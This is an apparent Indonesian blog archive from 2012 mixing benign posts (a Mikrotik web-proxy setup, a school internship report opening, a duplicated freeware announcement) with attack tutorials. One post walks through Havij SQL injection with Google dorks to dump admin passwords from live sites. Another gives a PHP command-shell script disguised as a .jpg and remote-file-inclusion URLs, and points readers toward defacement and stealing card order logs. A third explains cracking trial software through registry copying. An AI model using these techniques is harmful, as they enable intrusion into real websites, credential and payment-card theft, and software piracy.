Kamis, 08 November 2012

 

Tutorial SQL Injection Dengan Tools Havij 1.15



Pertama2 Download Havi


DiYou are not allowed to view links. Register or Login to view.

Setelah di Download Extract dimana saja,buka Havijnya,jika ada tulisan tabctl32.ocx blabla,disitu ada file bernama tabctl32.ocx copy kan ke C:\WINDOWS\system32 atau run dan tuliskan C:\WINDOWS\system32 lalu paste disitu

Jika sudah tampilanya seperti ini:


Spoiler: 


dan jika sudah tinggalkan sejenak,dan buka browser anda buka You are not allowed to view links. Register or Login to view. kita akan memasukan dork

saya pakai dork inurl:.my/index.php?viewnews.php .my untuk website malaysia terserah kamu ganti menjadi .il .id .au atau yang lainya,atau bisa juga pakai dork ini inurl:index.php?viewnews.php

untuk lengkapnya download dork di

Spoiler: 
You are not allowed to view links. Register or Login to view.

copykan dork ini ke google bar dan hasilnya seperti ini:

Spoiler: 


klik link yang ada dan akan seperti ini :

Spoiler: 


karena web ini telah saya Inject maka ini bisa untuk pembelajaran,setelah web terbuka kita cek vulnerabilitynya dengan tanda ' atau - maka akan seperti ini

Spoiler: 


jika ada peringatan seperti itu artinya web Vulnerable :D

sekarang kita buka Havij yang tadi: dan masukan Linknya tanpa tanda '


Spoiler: 


dan klik Analyze atau tanda panah ke kiri dan tunggu beberapa saat sampai tulisan status disamping wortel I'm Idle.

Jika sudah mendapatkan Databasenya klik Tables dan Get Tables seperti ini


Spoiler: 


disitu database bernama scanav_cms,klik Get Tables dan tunggu beberapa saat sampai muncul Tablenya
disitu ada beberapa Table dan saya memilih member_password dan membermanager,ceklis keduanya dan klik Get Columns,dan Tunggu beberapa saat sampai seperti ini,jika tidak ada Table dan Columns seperti ini carilah pada table2 lain dan get columns,misalkan ada table tb_admin atau tb_users dll,biasanya disitu.

Spoiler: 


setelah get data dan tunggu beberapa saat muncul Username dan Passwordnya

Spoiler: 



jika mendapatkan password berupa angka bisa anda Md5 nanti akan ada di akhir,kita sudah mendapatkan username dan password nya,ternyata usernamenya admin dan passwordnya ********,jika sudah saatnya Find Admin atau menemukan Admin Login Page/Tempat Admin Login


Spoiler: 


klik Find Admin dan masukan Situsnya kekotak yang tersedia,dan start tunggulah beberapa saat dan akan muncul seperti ini

Spoiler: 


buka halaman adminya di browser,atau bisa klik kiri kotaknya dan klik Open URL


Spoiler: 



seperti ini halaman adminya dan ketikan username serta passwordnya,dan klik Login,jika sudah Happy Hacking,silahkan kreasikan sesuka hati anda :)



eh iya hampir lupa soal MD5 nya,kalo anda mendapatkan Password berupa angka dan huruf mengacak begini caranya :

Spoiler: 


taraaa dan password akan terlihat :)
Maaf Post nya buru2 jadi acak2an hehe
Tutor Original:You are not allowed to view links. Register or Login to view.

Sekian
Share:

Kamis, 01 November 2012

 

Install Setting Web Proxy Mikrotik untuk Warnet


Install Setting Web Proxy Mikrotik untuk Warnet

Beberapa hari yang lalu seorang teman meminta bantuan untuk setting warnetnya menggunakan Proxy server, yang selama ini warnetnya tanpa menggunakan Proxy server.
Asumsinya ketika client1 mengakses website A maka proses yang terjadi adalah client1 meminta/request ke web server yang mempunyai website A tersebut. Ketika client2 atau yang lain mengakses website yang sama (website A) maka proses client tersebut akan mengulang kembali proses meminta/request ke web server tersebut. Seandainya ada banyak client lain yang mengakses website yang sama (website A) maka proses yang sama akan dilakukan lagi. nah inilah yang membuat akses terasa lambat.
Disinilah peran sebuah Proxy sangat dibutuhkan untuk mempercepat akses website. 

Suatu halaman website yang pernah dikunjungi oleh client akan disimpan (cache) di server proxy. Ketika ada client yang meminta/request suatu website maka client tidak langsung request ke webserver. client akan mencari website yang direquest-nya ke proxy dulu, kalo ada maka proxy akan menjawab request tersebut dan memberikannya ke client, jika website yang dicari tidak ditemukan di simpanan/Cache proxy barulah proxy server request website tersebut ke webserver dituju.
Spek PC : P3 800 Mhz, Mem 512, HD 30 Gb, 2 buah LAN Card (1 LAN onboard, 1 LAN tambahan)
OS : Mikrotik OS 2.29.XX ( crack version ) orignal recomende
ISP / WISP :
Client : 3 - 10 komputer
Konfigurasi Mikrotik :
#1. Setting Interface LAN card
/interface
set ether1 name=modem
set ether2 name=lan
keterangan:
ether1 diganti nama (interface) menjadi modem (koneksi dari dan ke modem)
ether2 diganti nama (interface) menjadi lan (koneksi dari dan ke jaringan LAN)
tujuannya biar mudah di ingat gak ada pengaruh ke akses-nya.
#2. Setting IP address
/ip address
add address=192.168.1.2/24 interface=modem
add address=192.168.10.1/24 interface=lan
keterangan :
ip address standart (umumnya) modem 192.168.1.1 jadi ip interface dari-ke modem antara 192.168.1.2-254
#3. Setting Gateway
/ip route
/add gateway=192.168.1.1
#4. Setting DNS
/ip dns
set primary-dns=202.134.1.10
set secondary-dns=203.130.196.155
set allow-remote-requests=yes
Keterangan :
DNS digunakan untuk menerjemahkan alamat IP ke domain (****.com, ****.net, dll) atau sebaliknya, ada beberapa DNS untuk speedy pilih yang latency-nya kecil dengan nge-ping agar akses ke dns-nya agak cepat dikit.
#5. Setting NAT
/ip firewall nat
add chain=srcnat action=masquerade out-interface=modem
keterangan :
Network Address Translation (NAT) fasilitas router untuk meneruskan paket dari ip asal dan atau ke ip tujuan dan merupakan standart internet yang mengizinkan komputer host dapat berkomunikasi dengan jaringan luar menggunakan ip address public.
#6. Setting web Proxy (transparent)
/ip web-proxy
set enabled=yes
set hostname=....... ( terserah )
set transparent-proxy=yes
set cache-administrator=admin@........ ( terserah )
Keterangan :
settingan web proxy yang lain menggunakan default bawaan mikrotik.
hostname=hostname dns atau ip address web proxy
cache-administrator=email admin yang bisa dihubungi ketika proxy error, yang akan ditampilkan pada browser client ketika proxy error.
#7. Setting redirect ke proxy
/ip firewall nat
add chain=dstnat protocol=tcp dst-port=80 action=redirect to-port=3128
keterangan :
Redirect digunakan untuk membelokkan/memaksa koneksi port 80 (www/web) dari client ke port 3128 default-nya web proxy mikrotik, jadi semua request client yang menggunakan port 80 (www/web) akan di belokkan ke web proxy mikrotik.
#8. Memonitor web proxy
/ip web-proxy
monitor interval=1
keterangan :
memonitor penggunaan web proxy mikrotik dengan interval waktu 1 detik
Hasilnya : memuaskan dan bikin puas…puas…!
Untuk jaringan yang besar dan client banyak sebaiknya menggunakan Squid di linux.
Selamat Mencoba.
Jangan lupa tinggalkan pesan.....
Share:

Rabu, 31 Oktober 2012

 

LAPORAN HASIL KERJA PRAKTEK INDUSTRI “SISTEM KEAMANAN KOMPUTER”


LAPORAN HASIL KERJA PRAKTEK INDUSTRI
 “SISTEM KEAMANAN KOMPUTER”





DISUSUN OLEH
NAMA           : ARIEF IQBAL AL MUSTAQIN
                                           NIS                  :



PROGRAM KEAHLIAN TEKNIK KOMPUTER DAN JARINGAN
SEKOLAH MENENGAH KEJURUAN NEGERI 7
PEKANBARU
2012


BAB I
PENDAHULUAN
1.1 Latar Belakang
Komputer merupakan temuan yang sangat spektakuler bagi segala bidang kehidupan. Semua ini memanfaatkan kecanggihan alat ini. Sampai saat ini kecanggihan tersebut berkembang dengan menggunakan jaringan yang memungkinkan user 1 dan yang lainnya terhubng tanpa batas waktu dan jarak ke seluruh dunia. Tentu saja hal ini sangat menguntungkan karena kita dapat bekerja dimanapun kita berada.
Akan tetapi berangkat dari begitu mudahnya pengaksesan jaringan ini, maka kita perlu sebuah keamanan jaringan untuk menyaring dan menentukan user-user yang boleh dan bias masuk dalam jaringan kita. Sehingga data-data serta semua informasi penting yang ada dalam jaringan kita tetap terjaga kerahasiaannya.
Oleh karena itu, sudah menjadi kewajiban kita sebagai siswa TKJ untuk menelusuri lebih dalam tentang segala aspek yang mungkin kita manfaatkan untuk meningkatkan kemanan jaringan tersebut diatas. Salah satunya adalah dengan memanfaatkan berbagai software-software yang ada dipasaran, yang memang diseting untuk system keamanan jaringan. Beberapa software yang bersangkutan dengan system keamanan jaringan antara lain:
Everest Corporate
Monitor Magic
Soft Perfect Personal Firewall
Software-software diatas adalah beberapa software yang dapat kita gunakan dalam system jaringan komputer.
1.2  Tujuan
Dari pokok permasalahan diatas maka penulis menguraikan beberapa tujuan dan keguanaan dari penyusunan makalah ini, antara lain:
1.      sebagai laporan penulisan yang telah menyelesaikan  parakerin di Mattcom Indonesia
2.      Mengetahui pengertian jaringan komputer
3.      Mengetahui sistem kerja software-software jaringan yang disebutkan diatas
4.      Sebagai syarat kelulusan untuk prakerin


1.3 Waktu Pelaksanaan
Peaktek kerja industri (parakerin ) di laksanakan pada saat kenaikan kelas (2) dua Dan bertepatan di semester  2 (dua).waktu pelaksanan parakerin diberikan kepada siswa selama 5 bulan.praktek kerja industri (prakerin) di mulai pada hari selasa,03 juli 2012 – senin  12 november  2012.setelah berakhirnya praktek kerja industri (prakerin) ini maka setiap siswa diwajibkan untuk membuat laporan praktek kerja industri (prakerin) sesuai dengan prosedur yang di tetap kan dengan guru pembimbing.
1.4 Pokok Permasalahan
Setelah melakukan pengamatan terhadap bahan pokok materi yang akan kita bahas dalam makalah ini, penulis menemukan beberapa pokok permasalahan yang akan dibahas. Beberapa diantaranya adalah :
1. Apakah pengertian jaringan itu?
2. Bagaimana kerja software-software jaringan yang diteliti (Everest Corporate, Monitor Magic, Soft Perfect Personal Firewall, Edvance LAN Scaner)?
3. lapisan jaringan
1.5 Sistematika Penulisan
Adapun untuk penulisan sistematika penulisan laporan praktek kerja industri (prakerin) terdiri dari 3 bab,yaitu :
      BAB 1 : Pendahuluan
Pada bab ini berisikan ltar blakang, tujuan,waktu pelaksanan,pokok permasalahan,dan sistematika penulisan
     BAB ll : Pembahasan
                       Pada bab ini berisikan, tentang sistem keamanan komputer
     BAB lll: penutup
Dalam bab ini akan menyimpul kan yang penulisan bahas dan   memberikan


Share:

Minggu, 28 Oktober 2012

 

PC Timer Manager 3.0.0 :


Dengan Menyebut Nama Allah yang Maha Pemurah lagi Maha Penyayang.
Assalamu'alaikum.

Memperkenalkan PC Timer Manager for Windows System v3.0.0 build 2


Apa itu PC Timer Manager ?
--------------------------------
Merupakan sebuah PC Software Utilities pengontrol waktu pada sebuah Komputer Dekstop / Laptop, dimana pemakai dapat membuat beberapa jadwal tugas seperti penjadwalan waktu shutdown (mode sekarang / mode berulang), penjadwalan aplikasi pengunci dekstop, penjadwalan alarm (mode sekarang / mode berulang) dan fitur pengatur tanggal dan waktu, yang beroperasi dibawah sistem Windows.


Fitur
====
-> Digunakan pada sistem Windows XP, VISTA, 7, 8 (x86/x64)
-> Melakukan penjadwalan shutdown mode sekarang
-> Melakukan penjadwalan shutdown rutin setiap hari
-> Melakukan penjadwalan shutdown berdasarkan tanggal dan waktu
-> Aplikasi pengunci dekstop dengan kata sandi (Parental control)
-> Penjadwalan waktu alarm (mode sekarang)
-> Mengganti nada dering alarm (mode sekarang)
-> Membuat jadwal alarm rutin (mode berulang)
-> Mengedit jadwal alarm rutin (mode berulang)
-> Mengatur tanggal dan waktu pada komputer / PC
-> Menu bantuan pada sistem tray


PC Timer Manager 3.0.0 :
------------------------------
-> Pengubahan lisensi XP Timer Utilities - Pro Edition menjadi PC Timer Manager (BETA VERSION)
-> Penambahan engine antidebug32, antikill, regsvr32
-> Perbaikan algoritma / prosedur kerja Dekstop Locker (aplikasi pengunci dekstop)
-> Perbaikan fitur alarm (mode sekarang)
-> Penambahan fitur penjadwalan alarm rutin (mode berulang)
-> Penambahan fitur pengeditan jadwal alarm rutin
-> Penambahan fitur pengaturan konfirmasi tugas shutdown sebelum dieksekusi
-> Perbaikan fitur petunjuk penggunaan (User Manual-id)
-> Perbaikan sistem registrasi
-> Perbaikan sistem database
-> Perbaikan sistem tray
-> Perbaikan icon dan interface


Kebutuhan Sistem :
-----------------------
-> Processor 950+ Megahertz (Mhz)
-> Sistem Operasi Windows 95-XP, VISTA, 7, 8 (x86/x64)
-> Format Regional Options Indonesia
-> Memory RAM 256 (512+ rekomendasi) MB
-> Ruang Hardisk 13+ MB
-> Grafik Directx 8+
-> Resolusi Display 800 * 600 (1024*768+ rekomendasi)

Link Unduh 6.16 MB :

http://www.mediafire.com/?29ayhh2z23xgiyq

Semoga dapat bermanfaat ^_^, dan
Alhamdulillahi Rabbil 'aalamin.
Dengan Menyebut Nama Allah yang Maha Pemurah lagi Maha Penyayang.
Assalamu'alaikum.

Memperkenalkan PC Timer Manager for Windows System v3.0.0 build 2


Apa itu PC Timer Manager ?
--------------------------------
Merupakan sebuah PC Software Utilities pengontrol waktu pada sebuah Komputer Dekstop / Laptop, dimana pemakai dapat membuat beberapa jadwal tugas seperti penjadwalan waktu shutdown (mode sekarang / mode berulang), penjadwalan aplikasi pengunci dekstop, penjadwalan alarm (mode sekarang / mode berulang) dan fitur pengatur tanggal dan waktu, yang beroperasi dibawah sistem Windows. 


Fitur 
==== 
-> Digunakan pada sistem Windows XP, VISTA, 7, 8 (x86/x64)
-> Melakukan penjadwalan shutdown mode sekarang
-> Melakukan penjadwalan shutdown rutin setiap hari
-> Melakukan penjadwalan shutdown berdasarkan tanggal dan waktu
-> Aplikasi pengunci dekstop dengan kata sandi (Parental control)
-> Penjadwalan waktu alarm (mode sekarang)
-> Mengganti nada dering alarm (mode sekarang)
-> Membuat jadwal alarm rutin (mode berulang)
-> Mengedit jadwal alarm rutin (mode berulang)
-> Mengatur tanggal dan waktu pada komputer / PC
-> Menu bantuan pada sistem tray


PC Timer Manager 3.0.0 : 
------------------------------
-> Pengubahan lisensi XP Timer Utilities - Pro Edition menjadi PC Timer Manager (BETA VERSION)
-> Penambahan engine antidebug32, antikill, regsvr32
-> Perbaikan algoritma / prosedur kerja Dekstop Locker (aplikasi pengunci dekstop)
-> Perbaikan fitur alarm (mode sekarang)
-> Penambahan fitur penjadwalan alarm rutin (mode berulang)
-> Penambahan fitur pengeditan jadwal alarm rutin
-> Penambahan fitur pengaturan konfirmasi tugas shutdown sebelum dieksekusi
-> Perbaikan fitur petunjuk penggunaan (User Manual-id)
-> Perbaikan sistem registrasi
-> Perbaikan sistem database
-> Perbaikan sistem tray
-> Perbaikan icon dan interface


Kebutuhan Sistem : 
-----------------------
-> Processor 950+ Megahertz (Mhz)
-> Sistem Operasi Windows 95-XP, VISTA, 7, 8  (x86/x64)
-> Format Regional Options Indonesia
-> Memory RAM 256 (512+ rekomendasi) MB
-> Ruang Hardisk 13+ MB
-> Grafik Directx 8+
-> Resolusi Display 800 * 600 (1024*768+ rekomendasi)

Link Unduh 6.16 MB :

http://www.mediafire.com/?29ayhh2z23xgiyq

Semoga dapat bermanfaat ^_^, dan
Alhamdulillahi Rabbil 'aalamin.
Share:

Minggu, 21 Oktober 2012

 

HACKING SERVER DENGAN PHP INJECTION




1. - Hosting file(Yg gratisan jg banyak. Contoh : Geocities , Ripway, dll)
2. - Lagu2 Linkin Park, Blink 182, My Chemical Romance buat nemenin aksi jahanam kamu



Oke, copy paste script berikut



Code:


<font face=verdana size=7></font>
<center>CMD - SystemCommand

</center><font face=Verdana size=1>
# CMD PHP : 
# Re-DESIGN by : Bagus Hacks A.K.A B-479


<hr></hr>
<font face=Verdana size=1>// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("
$output));
?>
</font>

<hr></hr>
<font face=Verdana size=1></font>
Bagus Hacks | Muslim Hacker | TeaMpOisoN | Anoymous | 
</font>
Kalo udah, save dng nama CMD dan format .jpg . Lalu upload ke hosting kamu. (Yg grtisan jg banyak, udh di bahas di atas) Setelah saya upload, nanti saya akan mendapat URL seperti berikut:
http://www.geocities/n4is3n/cmd.jpg

Setelah itu cari target (Ini membutuhkan kesabaran tingkat tinggi)

Setelah ketemu, contoh:

http://www.target.com/main.php?page=article

Nah, kamu ubah URL-nya jd

.http://www.target.com/main.php?page=http://www.geocities/n4is3n/cmd.jpg&cmd=<perintah unix="" disini=""></perintah>

Lalu eksekusi URL tsb! contoh:
.http://www.target.com/main.php?page=http://www.geocities/n4is3n/cmd.jpg&cmd=ls -l

dan liat hasil-nya... browser akan menampilakan semua direktori yg ada di server sesuai perintah UNIX tadi (ls -l adalah perintah untuk melihat isi direktori beserta
permission-nya).

Untuk defacing atau carding, kamu bisa mengexplore lbh jauh lg...

Oke...oke... saya kasih kata kunci-nya:

untuk deface = "index.html, index.php, index.htm"
untuk carding = "orderlog.txt, order.php"

Semua ada di server, tinggal bagaimana cara kamu menemukan-nya :D

so... Happy Hacking!
Share:
 

Membuat Crack Software Trial



Membuat Crack Software Trial . baik sobat sobat blogger semua, kali ini saya ingin memberikan bagaimana sih cara teknik Membuat Crack Software Trial ? nah kali ini , inilah yang saya akan bahas, ini saya dapatkan dari gruf fb bukan PC+ , semoga ini bermanfaat :
Mengakali suatu software bajakan menjadi asli adalah suatu yang bisa dibilang suatu tindakan ilegal, saya disini akan menjelaskan tentang tutorial cara membuat software trial menjadi full version.
Cara ini sebenarnya saya tujukan hanya untuk pelajaran semata, dan bukan   untuk mendorong adanya tindakan-tindakan illegal, khususnya dalam   pembajakan software dalam dunia IT.
untuk mengetahui lebih lanjut tentang membuat crack sederhana untuk Softwatre  berbayar/trial/komersil/shareware, cara ini sangat sederhana, sehingga  mudah dilakukan oleh siapapun, untuk lebih lanjut silahkan ikuti cara  dibawah ini :
1. Untuk langkah awal, kita bisa mencari terlebih dahulu software/aplikasi yang sudah full version yang sama dengan software trial yang ingin kita buat crack nya.
2. Pilih "START" lalu "RUN"
3. Lalu dilangkah ketiga ini kita ketik "REGEDIT" di tempat kosong pada RUN dan Enter/OK. seperti gambar di bawah ini
4. ketika "registry editor" muncul seperti gambar di bawah ini, silahkan kita cari terlebih dahulu registry aplikasi yang kita maksud.
5. Lalu pada langkah kelima ini kita lakukan klik kanan di tempat dimana folder registry aplikasi/software yang kita mau bikin untuk crack-an   nya, kemudian pilih export, dan setelah itu simpan (terserah mau di   simpen dimana, asal jangan sampai lupa naruhnya) untuk lebih jelasnya   silahkan lihat gambar dibawah ini.
6. Lalu setelah kita simpen folder registry tadi yang sudah mengandung crack nya, kita buka registry editor di tempat dimana software atau aplikasi yang masih trial tersebut.
7. Lalu pilih file dan pilih import kemudian gunakan registry yang tadi telah kita simpan
8. Dilangkah terakhir ini kita bisa lakukan restart pada komputer kita,  dan setelah komputer menyala lagi maka software   yang tadi nya TRIAL akan menjadi FULL dan REGISTRY yang tadi kita buat bisa kita gunakan  kembali pada software yang sama.
PERINGATAN : INI HANYA UNTUK PENGETAHUAN DAN BUKAN UNTUK PEMBAJAKAN SOFTWARE
Share: